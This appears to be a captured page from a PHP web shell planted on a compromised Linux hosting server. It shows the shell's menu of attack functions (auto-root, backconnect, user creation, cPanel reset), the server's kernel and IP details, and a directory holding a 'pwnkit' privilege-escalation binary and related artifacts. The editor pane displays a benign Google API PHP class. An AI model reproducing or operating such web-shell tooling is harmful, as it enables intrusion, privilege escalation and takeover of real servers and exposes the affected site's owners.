Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.175.37
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
lib /
google /
src /
Google /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Auth
[ DIR ]
drwxr-xr-x
Cache
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Http
[ DIR ]
drwxr-xr-x
IO
[ DIR ]
drwxr-xr-x
Logger
[ DIR ]
drwxr-xr-x
Service
[ DIR ]
drwxr-xr-x
Signer
[ DIR ]
drwxr-xr-x
Task
[ DIR ]
drwxr-xr-x
Utils
[ DIR ]
drwxr-xr-x
Verifier
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Client.php
19.89
KB
-rw-r--r--
Collection.php
2.53
KB
-rw-r--r--
Config.php
13.75
KB
-rw-r--r--
Exception.php
647
B
-rw-r--r--
Model.php
7.98
KB
-rw-r--r--
Service.php
1.26
KB
-rw-r--r--
Utils.php
3.85
KB
-rw-r--r--
autoload.php
1.04
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Service.php
<?php /* * Copyright 2010 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ class Google_Service { public $batchPath; public $rootUrl; public $version; public $servicePath; public $availableScopes; public $resource; private $client; public function __construct(Google_Client $client) { $this->client = $client; } /** * Return the associated Google_Client class. * @return Google_Client */ public function getClient() { return $this->client; } /** * Create a new HTTP Batch handler for this service * * @return Google_Http_Batch */ public function createBatch() { return new Google_Http_Batch( $this->client, false, $this->rootUrl, $this->batchPath ); } }
Close